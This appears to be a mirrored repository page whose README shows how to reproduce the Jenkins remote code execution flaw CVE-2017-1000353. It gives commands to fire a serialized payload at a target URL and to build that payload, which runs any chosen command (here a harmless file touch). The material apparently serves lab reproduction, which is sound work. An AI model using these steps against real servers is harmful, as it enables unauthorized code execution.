# CVE-2017-1000353 **Repository Path**: lxonz/CVE-2017-1000353 ## Basic Information - **Project Name**: CVE-2017-1000353 - **Description**: No description available - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2021-06-30 - **Last Updated**: 2021-06-30 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # CVE-2017-1000353 POC How to reproduce the Jenkins CVE-2017-1000353? Clone this repository, use the pre-built payload `jenkins_poc.ser` with flowing command: ``` python exploit.py http://your-ip:8080 jenkins_poc.ser ``` Then the `touch /tmp/success` would be executed. How to generate the payload `jenkins_poc.ser`? Download [CVE-2017-1000353-SNAPSHOT-all.jar](https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar). ``` java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success" ``` Referer: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353